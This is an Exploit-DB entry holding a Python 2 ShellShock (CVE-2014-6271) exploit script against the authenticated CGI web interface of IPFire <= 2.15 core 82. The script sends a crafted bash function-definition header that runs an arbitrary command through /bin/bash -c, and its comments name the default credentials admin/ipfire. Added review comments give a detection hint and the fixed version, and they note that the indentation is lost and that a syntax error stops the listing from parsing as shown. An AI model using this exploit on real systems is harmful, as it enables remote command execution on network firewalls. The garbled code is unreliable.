IPFire – CGI Web Interface (Authenticated) Bash Environment Variable Code Injection

  • 作者: Claudio Viviani
    日期: 2014-10-01
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/34839/
  • #!/usr/bin/env python
    #
    # Exploit Title : IPFire <= 2.15 core 82 Authenticated cgi Remote Command Injection (ShellShock)
    #
    # Exploit Author : Claudio Viviani
    #
    # Vendor Homepage : http://www.ipfire.org
    #
    # Software Link: http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso
    #
    # Date : 2014-09-29
    #
    # Fixed version: IPFire 2.15 core 83 (2014-09-28)
    #
    # Info: IPFire is a free Linux distribution which acts as a router and firewall in the first instance.
    # It can be maintained via a web interface.
    # The distribution furthermore offers selected server-daemons and can easily be expanded to a SOHO-server.
    # IPFire is based on Linux From Scratch and is, like the Endian Firewall, originally a fork from IPCop.
    #
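    # Vulnerability: the CGI web interface of IPFire <= 2.15 core 82 is affected by an authenticated
    # Bash environment variable code injection (CVE-2014-6271, "ShellShock"): the web server passes request
    # headers to CGI scripts as environment variables, and a vulnerable bash executes commands that trail
    # a function definition stored in such a variable.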
    #
    # Suggestion:
    #
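    # If you can't update the distro and you have installed IPFire via image files (ARM, Flash),
    # make sure to change the default credentials of the web user interface (user: admin, pass: ipfire).
    # This only limits who can reach the authenticated CGI pages; the actual fix is the update to core 83.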
    #
    #
    # http connection
    import urllib2
    # Basic Auth management Base64
    import base64
    # Args management
    import optparse
    # Error management
    import sys
    
    # Startup banner: ASCII-art title plus the author's contact links. The command-line
    # code at the end of the script prints it on every run.
    # NOTE(review): the art's column spacing looks collapsed in this listing.
    banner = """
     ___ _______ _______ _________ __
    | | _ | _ |__.----.-----. | _ .-----|__|
    |.|.1 |.1___|| _|-__| |.1___|_||
    |.|.____|.__) |__|__| |_____| |.|___|___|__|
    |:|:| |:| |:1 |_____|
    |::.|::.| |::.| |::.. . |
    `---`---' `---' `-------'
     _______ ____ __ _______ __ __
    | _ ||--.-----||| _ ||--.-----.----||--.
    | 1___| |-__||| 1___| |_|__|<
    |____ |__|__|_____|__|__|____ |__|__|_____|____|__|__|
    |:1 | |:1 |
    |::.. . | |::.. . |
    `-------' `-------'
    
    IPFire <= 2.15 c0re 82 Authenticated
    Cgi Sh3llSh0ck r3m0t3 C0mm4nd Inj3ct10n
    
    Written by:
    
    Claudio Viviani
    
     http://www.homelab.it
    
    info@homelab.it
    homelabit@protonmail.ch
    
     https://www.facebook.com/homelabit
    https://twitter.com/homelabit
     https://plus.google.com/+HomelabIt1/
     https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
    """
    
    # Check url
    def checkurl(url):
        """Return *url* unchanged when it carries an explicit http:// or https:// scheme.

        Any other value prints an error message and ends the process with
        exit status 1, so callers only ever receive an accepted URL.
        """
        has_scheme = url.startswith("https://") or url.startswith("http://")
        if has_scheme:
            return url
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    
    # Probe an IPFire web interface for CVE-2014-6271 and print the outcome to stdout.
    #
    # url  -- page to request
    # user -- user name for HTTP Basic authentication
    # pwd  -- password for HTTP Basic authentication
    # cmd  -- command text, concatenated unescaped into the crafted request header below
    # Returns nothing; every result is reported with print.
    #
    # NOTE(review): Python 2 only (urllib2, print statements, "except X, e"). This listing
    # has lost its indentation, and the membership test on the marker string is missing a
    # space ("incontent"), so the function does not parse as shown.
    #
    # For defenders: the second request is recognisable by a header value that begins with
    # the bash function-definition prefix "() {". Matching that prefix in request headers
    # (web server, proxy or IDS logs) identifies attempts against CVE-2014-6271. The file
    # header names IPFire 2.15 core 83 as the fixed version.
    def connectionScan(url,user,pwd,cmd):
    print '[+] Connection in progress...'
    try:
    # First request carries no credentials; a protected interface is expected to answer 401.
    response = urllib2.Request(url)
    content = urllib2.urlopen(response)
    # Reached only when the unauthenticated request succeeded, i.e. no Basic auth was demanded.
    print '[X] IPFire Basic Authentication not found'
    except urllib2.HTTPError, e:
    if e.code == 404:
    print '[X] Page not found'
    elif e.code == 401:
    try:
    print '[+] Authentication in progress...'
    # HTTP Basic credentials: base64 of "user:pwd"; encodestring() inserts newlines, removed here.
    base64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\n', '')
    # Header named VULN: a bash function definition, then an echo of a marker string, then the
    # caller's command run through /bin/bash -c.
    # NOTE(review): presumably the CGI layer exports this header as an environment variable,
    # which is where a vulnerable bash would parse it; the server side is not shown here.
    headers = {'VULN' : '() { :;}; echo "H0m3l4b1t"; /bin/bash -c "'+cmd+'"' }
    response = urllib2.Request(url, None, headers)
    response.add_header("Authorization", "Basic %s" % base64string)
    content = urllib2.urlopen(response).read()
    # The string "ipfire" in the body is treated as proof that the login worked and the page is IPFire's.
    if "ipfire" in content:
    print '[+] Username & Password: OK'
    print '[+] Checking for vulnerability...'
    # The echoed marker appearing in the response is treated as proof that the header was executed.
    if 'H0m3l4b1t' incontent:
    print '[!] Command "'+cmd+'": INJECTED!'
    else:
    print '[X] Not Vulnerable :('
    else:
     print '[X] No IPFire page found'
    # Error handling for the authenticated request: a second 401 means the credentials were rejected.
    except urllib2.HTTPError, e:
    if e.code == 401:
     print '[X] Wrong username or password'
    else:
     print '[X] HTTP Error: '+str(e.code)
    except urllib2.URLError:
    print '[X] Connection Error'
    # NOTE(review): presumably the fall-through of the 404/401 chain for the first request;
    # the nesting cannot be confirmed from this flattened listing.
    else:
    print '[X] HTTP Error: '+str(e.code)
    except urllib2.URLError:
    print '[X] Connection Error'
    
    # Command-line interface: target URL, command, user name and password are all required.
    # NOTE(review): the password is taken from argv, so it is visible in the local process
    # list and shell history of whoever runs the script.
    commandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c "touch /tmp/test.txt"')
    for short_flag, long_flag, help_text in (
        ('-t', '--target', "Insert TARGET URL"),
        ('-c', '--cmd', "Insert command name"),
        ('-u', '--user', "Insert username"),
        ('-p', '--pwd', "Insert password"),
    ):
        commandList.add_option(short_flag, long_flag, action="store", help=help_text)
    options, remainder = commandList.parse_args()

    # The banner is shown on every run; a missing option additionally prints the usage
    # text and ends the process with exit status 1.
    print(banner)
    if not all((options.target, options.cmd, options.user, options.pwd)):
        commandList.print_help()
        sys.exit(1)

    # checkurl() exits the process unless the target starts with http:// or https://.
    url = checkurl(options.target)
    cmd = options.cmd
    user = options.user
    pwd = options.pwd

    connectionScan(url, user, pwd, cmd)